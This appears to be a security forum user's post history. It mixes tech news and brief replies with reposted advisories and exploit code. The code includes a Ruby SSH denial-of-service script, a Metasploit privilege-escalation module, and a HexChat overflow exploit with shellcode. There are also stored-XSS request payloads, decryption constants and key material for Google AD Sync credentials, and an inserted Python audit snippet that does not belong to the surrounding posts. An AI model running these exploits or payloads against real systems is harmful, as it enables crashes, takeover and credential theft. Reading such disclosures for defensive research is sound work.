Everything posted by Kwelwild

  1. Description: HashCollect.py is a Python tool I wrote that will scrape MD5 hashes out of a specific file or URL. While this script is pretty bare right now, it gets the job done. I have many plans for it that you will hopefully see soon. That's it for now, but I will grow this out soon. Some of the features I am thinking about adding are:

    - Allow custom regex
    - Allow for pulling other hashes like SHA256
    - Check hashes against online hash crackers
    - Output to a database
    - Create a frontend
    - What would you like to see?

    Find out more at TekDefense - News
    Twitter: @TekDefense

    Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
    Original Source:
    Source: Tektip Ep27 - Hashcollect
  2. Google AD Sync Tool - Exposure of Sensitive Information Vulnerability

    Sense of Security - Security Advisory - SOS-13-001

    Release Date. 03-Apr-2013
    Last Update. -
    Vendor Notification Date. 03-Sep-2012
    Product. Google Active Directory Sync (GADS) Tool
    Platform. Windows, Linux, Solaris
    Affected versions. All versions up to 3.1.3
    Severity Rating. High
    Impact. Exposure of sensitive information
    Attack Vector. From local without authentication
    Solution Status. Upgrade to version 3.1.6
    CVE reference. CVE - not yet assigned

    Details.
    Due to a weakness in the way the Java encryption algorithm (PBEwithMD5andDES) has been implemented in the GADS tool, all stored credentials can be decrypted into plain-text. This includes all of the encrypted passwords stored in any end-user's saved XML configuration file, such as Active Directory accounts, SMTP, Proxy details, LDAP and OAuth tokens, etc.

    Proof of Concept.
    Using the following information from the XML and GADS tool to decrypt all encrypted passwords from any XML:
    1. The hard coded salt: SALT[] = { -87, -101, -56, 50, 86, 53, -29, 3 }
    2. The hard coded DES iteration count: ITERATION_COUNT = 20
    3. The Secret key derived from the uniqueID value in the XML: 6512630db9a74d90a5531f574b85f398
    4. The cipher-text from the XML: <encryptedAdminPassword>1edOUtamjNA=</encryptedAdminPassword>
    5. The algorithm: PBEwithMD5andDES
    The decrypted value is: winning!

    Solution.
    Upgrade to version 3.1.6

    Discovered by.
    Nathaniel Carew from Sense of Security Labs.

    About us.
    Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the country's largest organisations.

    Sense of Security Pty Ltd
    Level 8, 66 King St
    Sydney NSW 2000
    AUSTRALIA
    T: +61 (0)2 9290 4444
    F: +61 (0)2 9290 4455
    W: http://www.senseofsecurity.com.au/consulting/penetration-testing
    E: info@senseofsecurity.com.au
    Twitter: @ITsecurityAU

    The latest version of this advisory can be found at: http://www.senseofsecurity.com.au/advisories/SOS-13-001.pdf
    Other Sense of Security advisories can be found at: http://www.senseofsecurity.com.au/research/it-security-advisories.php

    Source: Google AD Sync Tool - Exposure of Sensitive Information Vulnerability
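The weakness this advisory describes, as an added example (not part of the advisory and not GADS code): the PKCS#5 PBKDF1 derivation behind PBEwithMD5andDES, run with the advisory's hard-coded salt and iteration count, followed by a check that lists which fields of a saved config hold reversible credentials and need rotating after the upgrade. The `<uniqueID>` element name, the use of its text as the passphrase, and the sample XML layout are assumptions.

```python
import base64
import hashlib
import re

# Constants quoted in the advisory. Java bytes are signed, so mask to 0..255.
HARDCODED_SALT = bytes(b & 0xFF for b in (-87, -101, -56, 50, 86, 53, -29, 3))
ITERATION_COUNT = 20

# Constructed sample config. The two values come from the advisory; the
# <uniqueID> element name and the surrounding layout are assumptions.
SAMPLE_CONFIG = """<config>
  <uniqueID>6512630db9a74d90a5531f574b85f398</uniqueID>
  <encryptedAdminPassword>1edOUtamjNA=</encryptedAdminPassword>
</config>"""


def pbkdf1_md5(passphrase, salt, count):
    """PKCS#5 v1.5 PBKDF1 with MD5, the derivation behind PBEwithMD5andDES.

    Hash passphrase||salt once, re-hash the digest count-1 times, then split
    the 16-byte result into an 8-byte DES key and an 8-byte CBC IV.
    Every input is either a constant in the tool or (assumed) a value in the
    same file as the ciphertext, so the output is not a secret.
    """
    digest = hashlib.md5(passphrase + salt).digest()
    for _ in range(count - 1):
        digest = hashlib.md5(digest).digest()
    return digest[:8], digest[8:]


def audit_config(xml_text):
    """Report what a saved config exposes to anyone who can read the file."""
    uid = re.search(r"<uniqueID>\s*([0-9A-Fa-f]+)\s*</uniqueID>", xml_text)
    fields = {}
    # Any <encryptedXxx> element is treated as a reversibly stored credential.
    for tag, b64 in re.findall(r"<(encrypted\w+)>\s*([^<\s]+)\s*</\1>", xml_text):
        fields[tag] = len(base64.b64decode(b64))  # ciphertext size in bytes
    return {
        # True when the key input sits next to the ciphertext it protects.
        "key_material_in_file": uid is not None,
        "ciphertext_bytes": fields,
        # Credentials to change once the tool is upgraded.
        "rotate": sorted(fields),
    }


if __name__ == "__main__":
    report = audit_config(SAMPLE_CONFIG)
    print("key material stored with ciphertext:", report["key_material_in_file"])
    for name in report["rotate"]:
        print("rotate credential behind <%s> (%d-byte ciphertext)"
              % (name, report["ciphertext_bytes"][name]))
```
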
  3. Sysax Multi Server 6.10 - SSH Denial of Service #!/usr/bin/env ruby # Sysax Multi Server 6.10 SSH DoS # Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html require 'socket' unless ARGV.length == 2 puts "Usage: ruby #{$0} [host] [port]\n" exit end packet = [0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f, 0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7, 0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00, 0x00, 0x7e, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, 0x32, 0x35, 0x36, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x2d, 0x65, 0x78, 0x63, 0x68, 0x61, 0x6e, 0x67, 0x65, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x34, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x64, 0x69, 0x66, 0x66, 0x69, 0x65, 0x2d, 0x68, 0x65, 0x6c, 0x6c, 0x6d, 0x61, 0x6e, 0x2d, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x31, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x00, 0x00, 0x00, 0x0f, 0x73, 0x73, 0x68, 0x2d, 0x72, 0x73, 0x61, 0x2c, 0x73, 0x73, 0x68, 0x2d, 0x64, 0x73, 0x73, 0x00, 0x00, 0x00, 0x9d, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 
0x61, 0x65, 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x9d, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x33, 0x64, 0x65, 0x73, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x62, 0x6c, 0x6f, 0x77, 0x66, 0x69, 0x73, 0x68, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x63, 0x61, 0x73, 0x74, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x31, 0x32, 0x38, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x32, 0x35, 0x36, 0x2c, 0x61, 0x72, 0x63, 0x66, 0x6f, 0x75, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x62, 0x63, 0x2c, 0x72, 0x69, 0x6a, 0x6e, 0x64, 0x61, 0x65, 0x6c, 0x2d, 0x63, 0x62, 0x63, 0x40, 0x6c, 0x79, 0x73, 0x61, 0x74, 0x6f, 0x72, 0x2e, 0x6c, 0x69, 0x75, 0x2e, 0x73, 0x65, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x32, 0x38, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x31, 0x39, 0x32, 0x2d, 0x63, 0x74, 0x72, 0x2c, 0x61, 0x65, 0x73, 0x32, 0x35, 0x36, 0x2d, 0x63, 0x74, 0x72, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, 0x00, 0x00, 0x69, 0x68, 0x6d, 0x61, 0x63, 
0x2d, 0x6d, 0x64, 0x35, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2c, 0x75, 0x6d, 0x61, 0x63, 0x2d, 0x36, 0x34, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x72, 0x69, 0x70, 0x65, 0x6d, 0x64, 0x31, 0x36, 0x30, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x73, 0x68, 0x61, 0x31, 0x2d, 0x39, 0x36, 0x2c, 0x68, 0x6d, 0x61, 0x63, 0x2d, 0x6d, 0x64, 0x35, 0x2d, 0x39, 0x36, 0x00, #3rd byte in this next line causes crash 0x00, 0x00, 0x28, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x1a, 0x7a, 0x6c, 0x69, 0x62, 0x40, 0x6f, 0x70, 0x65, 0x6e, 0x73, 0x73, 0x68, 0x2e, 0x63, 0x6f, 0x6d, 0x2c, 0x7a, 0x6c, 0x69, 0x62, 0x2c, 0x6e, 0x6f, 0x6e, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00].pack("C*") host = ARGV[0] port = ARGV[1] sock = TCPSocket.open(host, port) banner = sock.gets() puts banner sock.puts("SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1\r\n") sock.puts(packet) resp = sock.gets() sock.close() Sursa: Sysax Multi Server 6.10 - SSH Denial of Service
  4. PM Sent!
  5. Kwelwild

    Chat

    And here I was, getting ready to talk to Nytro about making a chat. Just kidding, pathetic guy.
  6. Since you saw 'nasa.gov' there, of course it's interesting. I bet you haven't tested it (that's because you probably don't know how it works).
  7. The Facebook button that few people know exists. How you can have total "privacy" online

    According to a specialist site, there is a very simple solution for those who use Facebook but are not at all interested in apps or ads. There is a method by which other sites or apps can no longer access your account. The Facebook platform also includes games, apps and other sites integrated with the social network. It allows users' personal information to be accessed and shared. If you want total "privacy" on Facebook, the best method is to turn this platform off, and any sharing of personal data will then be blocked, Life Hacker writes. Of course, if you do this, you will no longer be able to use the apps or sites integrated with the platform either. To turn it off, go to "privacy settings" and click the Edit button in the Apps you use section. Then, if you are determined to take this step, press Platform turn off.

    Source: The Facebook button that few people know exists. How you can have total "privacy" online
  8. HP System Management Homepage Local Privilege Escalation

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'
    require 'rex'
    require 'msf/core/post/common'
    require 'msf/core/exploit/local/linux'
    require 'msf/core/exploit/exe'

    class Metasploit4 < Msf::Exploit::Local

      include Msf::Exploit::EXE
      include Msf::Post::File
      include Msf::Post::Common
      include Msf::Exploit::Local::Linux

      def initialize(info={})
        super( update_info( info, {
          'Name' => 'HP System Management Homepage Local Privilege Escalation',
          'Description' => %q{
            Versions of HP System Management Homepage <= 7.1.2 include a setuid root
            smhstart which is vulnerable to a local buffer overflow in SSL_SHARE_BASE_DIR
            env variable.
          },
          'License' => MSF_LICENSE,
          'Author' =>
            [
              'agix' # @agixid # Vulnerability discovery and Metasploit module
            ],
          'Platform' => [ 'linux' ],
          'Arch' => [ ARCH_X86 ],
          'SessionTypes' => [ 'shell' ],
          'Payload' =>
            {
              'Space' => 227,
              'BadChars' => "\x00\x22"
            },
          'References' =>
            [
              ['OSVDB', '91990']
            ],
          'Targets' =>
            [
              [ 'HP System Management Homepage 7.1.1',
                {
                  'Arch' => ARCH_X86,
                  'CallEsp' => 0x080c86eb, # call esp
                  'Offset' => 58
                }
              ],
              [ 'HP System Management Homepage 7.1.2',
                {
                  'Arch' => ARCH_X86,
                  'CallEsp' => 0x080c8b9b, # call esp
                  'Offset' => 58
                }
              ],
            ],
          'DefaultOptions' =>
            {
              'PrependSetuid' => true
            },
          'DefaultTarget' => 0,
          'DisclosureDate' => "Mar 30 2013",
        }
        ))
        register_options([
          OptString.new("smhstartDir", [ true, "smhstart directory", "/opt/hp/hpsmh/sbin/" ])
        ], self.class)
      end

      def exploit
        pl = payload.encoded
        padding = rand_text_alpha(target['Offset'])
        ret = [target['CallEsp']].pack('V')

        exploit = pl
        exploit << ret
        exploit << "\x81\xc4\x11\xff\xff\xff" # add esp, 0xffffff11
        exploit << "\xe9\x0e\xff\xff\xff" # jmp => beginning of pl
        exploit << padding
        exploit_encoded = Rex::Text.encode_base64(exploit) # to not break the shell base64 is better
        id=cmd_exec("id -un")
        if id!="hpsmh"
          fail_with(Exploit::Failure::NoAccess, "You are #{id}, you must be hpsmh to exploit this")
        end
        cmd_exec("export SSL_SHARE_BASE_DIR=$(echo -n '#{exploit_encoded}' | base64 -d)")
        cmd_exec("#{datastore['smhstartDir']}/smhstart")
      end

    end

    Source: HP System Management Homepage Local Privilege Escalation - Packet Storm
  9. HexChat 2.9.4 Local Exploit Submission #!/usr/bin/python # HexChat 2.9.4 Local Exploit # Bug found by Jules Carter < @iMulitia > # Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B"*30 shellcode = ( # msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x68\x6b\x6d\x4b\x4b\x69" "\x44\x34\x64\x64\x59\x64\x74\x71\x78\x52\x6c\x72\x33\x47\x34" "\x71\x78\x49\x42\x44\x4e\x6b\x50\x71\x50\x30\x4e\x6b\x64\x36" "\x54\x4c\x4c\x4b\x44\x36\x77\x6c\x4c\x4b\x33\x76\x77\x78\x4c" "\x4b\x73\x4e\x51\x30\x4e\x6b\x75\x66\x56\x58\x72\x6f\x72\x38" "\x51\x65\x68\x73\x43\x69\x37\x71\x38\x51\x39\x6f\x58\x61\x73" "\x50\x4e\x6b\x30\x6c\x36\x44\x77\x54\x6c\x4b\x42\x65\x75\x6c" "\x6e\x6b\x73\x64\x36\x48\x31\x68\x46\x61\x6a\x4a\x4e\x6b\x52" "\x6a\x66\x78\x6e\x6b\x73\x6a\x57\x50\x43\x31\x7a\x4b\x6d\x33" "\x34\x74\x42\x69\x6c\x4b\x47\x44\x4c\x4b\x67\x71\x48\x6e\x74" "\x71\x6b\x4f\x36\x51\x79\x50\x6b\x4c\x4e\x4c\x4c\x44\x39\x50" "\x34\x34\x75\x57\x49\x51\x4a\x6f\x36\x6d\x67\x71\x4a\x67\x5a" "\x4b\x5a\x54\x67\x4b\x71\x6c\x61\x34\x34\x68\x32\x55\x6d\x31" "\x6e\x6b\x33\x6a\x47\x54\x76\x61\x38\x6b\x71\x76\x4c\x4b\x64" "\x4c\x52\x6b\x4e\x6b\x71\x4a\x67\x6c\x67\x71\x4a\x4b\x4e\x6b" "\x74\x44\x4c\x4b\x76\x61\x69\x78\x4e\x69\x62\x64\x66\x44\x47" "\x6c\x63\x51\x5a\x63\x6e\x52\x33\x38\x61\x39\x69\x44\x6b\x39" "\x59\x75\x6c\x49\x58\x42\x73\x58\x4e\x6e\x72\x6e\x56\x6e\x58" "\x6c\x62\x72\x4d\x38\x4f\x6f\x6b\x4f\x69\x6f\x69\x6f\x4f\x79" "\x61\x55\x75\x54\x6d\x6b\x31\x6e\x4e\x38\x79\x72\x70\x73\x6f" "\x77\x45\x4c\x45\x74\x70\x52\x39\x78\x6c\x4e\x4b\x4f\x49\x6f" "\x59\x6f\x6f\x79\x43\x75\x55\x58\x73\x58\x62\x4c\x70\x6c\x51" 
"\x30\x77\x31\x53\x58\x67\x43\x54\x72\x66\x4e\x61\x74\x71\x78" "\x52\x55\x44\x33\x62\x45\x61\x62\x6d\x58\x51\x4c\x75\x74\x57" "\x7a\x4c\x49\x58\x66\x73\x66\x6b\x4f\x30\x55\x47\x74\x6b\x39" "\x4f\x32\x72\x70\x4d\x6b\x39\x38\x6d\x72\x72\x6d\x4f\x4c\x4b" "\x37\x35\x4c\x67\x54\x30\x52\x5a\x48\x75\x31\x39\x6f\x6b\x4f" "\x39\x6f\x33\x58\x42\x4f\x34\x38\x53\x68\x31\x30\x72\x48\x35" "\x31\x73\x57\x61\x75\x62\x62\x35\x38\x72\x6d\x72\x45\x54\x33" "\x62\x53\x54\x71\x69\x4b\x6f\x78\x33\x6c\x75\x74\x54\x4a\x6f" "\x79\x78\x63\x61\x78\x72\x78\x45\x70\x77\x50\x75\x70\x70\x68" "\x72\x6d\x50\x53\x37\x36\x77\x51\x70\x68\x43\x42\x30\x6f\x42" "\x4d\x71\x30\x35\x38\x52\x4f\x66\x4c\x31\x30\x61\x76\x61\x78" "\x71\x58\x50\x65\x42\x4c\x32\x4c\x55\x61\x5a\x69\x6e\x68\x72" "\x6c\x61\x34\x44\x50\x4f\x79\x4d\x31\x56\x51\x4b\x62\x33\x62" "\x61\x43\x46\x31\x52\x72\x39\x6f\x58\x50\x46\x51\x49\x50\x42" "\x70\x69\x6f\x36\x35\x34\x48\x41\x41" ) junk2 = "A"*(13306-len(shellcode)) stage1 = "\x4c\x4c\x77\x21" # 21 byte jump (JA) ret = "\x63\x64\x62\x68" # ASCII PPR junk3 = "C"*29 stage2 = "\x61"*38 # POPAD x 38 stage2 += "\x54" # PUSH ESP stage2 += "\xE9" # RETN # This byte is a bad char, but gets converted to RETN and \x88 junk4 = "D"*11586 print "Copy this text, and enter into HexChat's textbox: \"/server [string]\"" print junk1 + shellcode + junk2 + stage1 + ret + junk3 + stage2 + junk4 Sursa: HexChat 2.9.4 Local Exploit Submission
  10. PM Sent!
  11. PM Sent!
  12. PM Sent!
  13. Done! PM Sent!
  14. Facebook Home. Everything about the Android app launched Thursday evening. Chat is much improved.

    The app was launched on Thursday at Facebook's headquarters in Menlo Park.

    Mark Zuckerberg launched Facebook Home on Thursday evening, intended for certain gadgets running the Android operating system. It completely changes your smartphone, turning it into one dedicated to Facebook. "We're not building a phone, and we're not building an operating system, but we're doing more than an app," said the social network's founder, Mark Zuckerberg. Once installed, Facebook Home takes control of the phone from the moment it is unlocked. It brings together several of the social network's apps that let you keep in touch with friends more easily. Facebook Home follows the same line Facebook focuses on, with interfaces featuring large images. "Normally, when you turn on your phone you see a clock, an email or a calendar. With Home, we give this screen more value. As soon as you turn on your phone, this is what you see," said Adam Mosseri, director of products at Facebook. The phone's main screen turns into a so-called Cover Feed, a phone version of the News Feed. Messaging is much improved thanks to the so-called "Chat Heads". The app helps you follow notifications more easily, and the usage gestures are natural. Cory Ondrejka of Facebook said the app is available in Google Play and will run on various devices, phones and tablets alike. For tablets, he says the experience will be brilliant. Facebook has for now launched only the phone version. The tablet version will come in a few months. The app will be improved constantly, month by month, the Facebook representative also promises. Initially, the app can be used on the HTC One, One X, Samsung Galaxy S3, Note II and Galaxy S4. It can be downloaded from April 12.

    Here is how you put Facebook Home on your phone: http://www.youtube.com/watch?feature=player_embedded&v=tWKE0HTl0ig

    For now, Facebook Home can be downloaded only by Americans, but Zuckerberg promised that it will soon be available in other parts of the world too, if all goes well. It will also be enriched with new features over time. Asked when a similar app will appear for other operating systems, Zuckerberg said he has an extraordinary relationship with the people at Apple, but that "the way you work with different operating systems is different every time. The people at Apple are much more closed. Android is much more open". "Windows is somewhere in the middle," he adds. At the same event, HTC First was also launched, a mobile phone released by the Taiwanese company in collaboration with Facebook and the American mobile operator AT&T. It will have the Facebook Home app built in and will be available only in the US starting April 12. For now, pre-orders can be placed. The phone will be 4G, but its full specifications have not been made public.

    Source: Facebook Home. Everything about the Android app launched Thursday evening. Chat is much improved. VIDEO - www.yoda.ro
  15. Description: In this video Matt Graeber talks about Parsing Binary File Formats with PowerShell.

    Why parse binary file formats?
    - Malware analysis: You need the ability to compare a malicious/malformed file against known good files.
    - Fuzzing: You want to generate thousands or millions of malformed files of a certain format in order to stress test or find vulnerabilities in programs that open that particular file format.
    - Curiosity: You simply want to gain an understanding of how a piece of software interprets a particular file format.

    Why use PowerShell to parse binary file formats?
    - Once parsed, file formats can be represented as objects.
    - Objects can be inspected, analyzed, and/or manipulated with ease.
    - Its output can be passed to other functions/cmdlets/scripts for further processing.
    - Automation! Once a parser is written, you can analyze a large number of file formats, quickly perform analysis, and gather statistics on a large collection of files.
    - Example: You could analyze all known good file formats on a clean system, take a baseline of known good and use that as a heuristic to determine if an unknown file is potentially malicious or malformed.

    Slide: http://www.exploit-monday.com/2013/03/ParsingBinaryFileFormatsWithPowerShell.html

    Source: Parsing Binary File Formats With Powershell
  16. Description: The video above is just a short demo of the worm propagation simulation. For full details, please read our newly launched blog here: SecurityTube.net Hack of the Day: Simulating an SSH Worm using Python. Please leave your comments behind!

    Source: Simulating An Ssh Worm In Python
  17. Google may be fined in the European Union for violating privacy

    27 countries, including Romania, could fine the American giant for not complying with the rules on privacy, rules introduced in March 2012.

    With France at the helm, organizations from the United Kingdom, the Netherlands, Germany, Spain and Italy want the Americans at Google to pay for failing to respect privacy. The European organizations want to know what kind of information Google keeps from users, for how long, and whether this information will reach third parties. The fines would be paid for each country in the European Union, including Romania. The fine is not very large: France can ask for up to 300,000 euros, while the United Kingdom cannot ask for more than 500,000 pounds sterling. Google earns 300,000 euros in three minutes, the American company's annual earnings being around 61 billion dollars. Google dominates the online market in Europe, with more than 95% of European users' searches being made through the American engine. By comparison, Americans use Google at a rate of 65%. Almost a month ago, Google agreed to pay 7 million dollars for the "accidental" collection of data over Wi-Fi while photographing streets in the United States for the well-known Street View service.

    Source: Google may be fined in the European Union for violating privacy - www.yoda.ro
  18. Are you by any chance from Hackerville?! If not, do you like it in Ramnicu Valcea?!
  19. Network Weathermap 0.97a (editor.php) - Persistent XSS

    Network Weathermap 0.97a - Persistent XSS
    Earlier versions are also possibly vulnerable.

    INFORMATION
    Product: Network Weathermap 0.97a
    Remote-exploit: yes
    Vendor-URL: http://www.network-weathermap.com/
    Discovered by: Daniel Ricardo dos Santos
    CVE Request - 15/03/2013
    CVE Assign - 18/03/2013
    CVE Number - CVE-2013-2618
    Vendor notification - 18/03/2013
    Vendor reply - No reply
    Public disclosure - 01/04/2013

    OVERVIEW
    Network Weathermap 0.97a is vulnerable to a persistent XSS when displaying available files.

    INTRODUCTION
    Network Weathermap is a network visualisation tool, to take data you already have and show you an overview of your network in map form. Support is built in for RRD, MRTG (RRD and old log-format), and tab-delimited text files. Other sources are via plugins or external scripts.

    VULNERABILITY DESCRIPTION
    The vulnerability happens when a user injects HTML and Javascript into the title of a map in editor.php. This title is later shown to the user when listing the files in editor.php?action=newfile

    Besides the title, other fields also allow an attacker to upload malicious PHP code to a webserver, which can later be executed if the attacker has direct access to that file.

    This application is often used as a plugin for Cacti. The vulnerability can be exploited in this mode as well, in weathermap-cacti-plugin-mgmt.php?action=viewconfig&file=<affected_file> and it can be used to exploit Cacti.

    To test it, simply create a map or edit an existing one:
    GET editor.php?mapname=test&action=newmap

    Then edit the map title with the payload:
    POST editor.php
    plug=0&mapname=test&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&link_commentin=&link_commentposin=95&link_commentout=&link_commentposout=5&map_title=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&map_legend=Traffic+Load&map_stamp=Created%3A+%25b+%25d+%25Y+%25H%3A%25M%3A%25S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=&editorsettings_showvias=0&editorsettings_showrelative=0&editorsettings_gridsnap=NO

    Then display the titles:
    GET editor.php

    VERSIONS AFFECTED
    Tested with version 0.97a (current release) but earlier versions are possibly vulnerable.

    SOLUTION
    There is no official patch currently available.

    NOTES
    The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2013-2618 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

    CREDITS
    Daniel Ricardo dos Santos
    SEC+ Information Security Company - http://www.secplus.com.br/

    Source: Network Weathermap 0.97a (editor.php) - Persistent XSS
  20. Wordpress FuneralPress Plugin 1.1.6 - Persistent XSS

    #
    # WP FuneralPress - stored xss in guestbook
    #
    # "FuneralPress is an online website obituary management and guest book program for funeral homes and cemeteries"
    # http://wpfuneralpress.com/
    #
    # tested on: funeralpress version 1.1.6 / wordpress version 3.5.1
    #
    # impact:
    # malicious script execution as wordpress administrator
    #
    # author: robarmstrong.te71@gmail.com
    #

    # summary
    A low-privilege or guest user can inject code via the <textarea name="photo-message">, <textarea name="youtube-message"> and <textarea name="message"> elements which are part of the wpfh_upload_form form in http://site/obituaries/?id=[ID]&f=guestbook&m=add

